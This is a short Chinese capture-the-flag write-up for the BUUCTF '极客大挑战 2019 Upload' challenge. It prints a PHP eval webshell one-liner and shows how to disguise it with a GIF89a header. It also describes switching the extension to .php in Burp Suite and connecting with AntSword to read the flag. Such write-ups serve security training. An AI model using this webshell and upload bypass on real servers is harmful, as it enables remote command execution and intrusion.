8.28 BUUCTF [极客大挑战 2019]Upload

利用文件上传一句话木马
打开靶机：

写一个 hack.txt

<script language='php'>eval($_POST['hack']);</script>

另存为 .jpg 上传 发现靶机会识别内容发现不是img
在语句前面加上 幻术文件头：

GIF89a
<script language='php'>eval($_POST['hack']);</script>

发现上传成功

再次上传并打开 burpsuite抓包 将后缀 修改为 .php 用repeater发送

访问 /upload/hack.php
可以发现上传的内容

打开中国蚁剑连接 密码为 hack
就可以访问

打开Linux虚拟终端
运行命令 cat /flag (cat flag 不行)
就可以得到 flag{}了

经验+1：https://buuoj.cn/challenges#[ACTF2020 新生赛]Upload